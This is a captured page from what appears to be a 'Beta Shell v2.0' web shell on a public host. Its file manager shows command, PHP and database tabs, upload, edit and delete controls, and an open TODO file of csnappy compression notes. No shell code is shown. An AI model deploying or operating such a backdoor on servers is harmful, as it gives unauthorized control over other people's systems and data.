Beta Shell
v2.0 ยท web2.us.cloudlogin.co
[FM]
[CMD]
[PHP]
[DB]
[INFO]
[SEC]
File Manager
~
/
usr
/
share
/
doc
/
csnappy
Upload
4 items
Name
Size
Perms
Modified
Actions
[ .. / .. ]
README
1.63 KB
-rw-r--r--
2019-07-10 19:43:34
Edit
Del
TODO
453 B
-rw-r--r--
2019-07-10 19:43:34
Edit
Del
Editing: TODO
(453 B)
Path: /usr/share/doc/csnappy/TODO
Back
* test with debug config option * rename CamelCase symbols to linux_style (?) * test on 32bit x86 qemu * test on non-x86 hardware * consider hash functions with better performance on other arches. * consider hash table with say, 8, possible matches. * check what compression ratio, speed, memory use looks like if instead of hash table with 16K entries for 32K values and no chaining we use a hash map that stores all values (establish upper limits).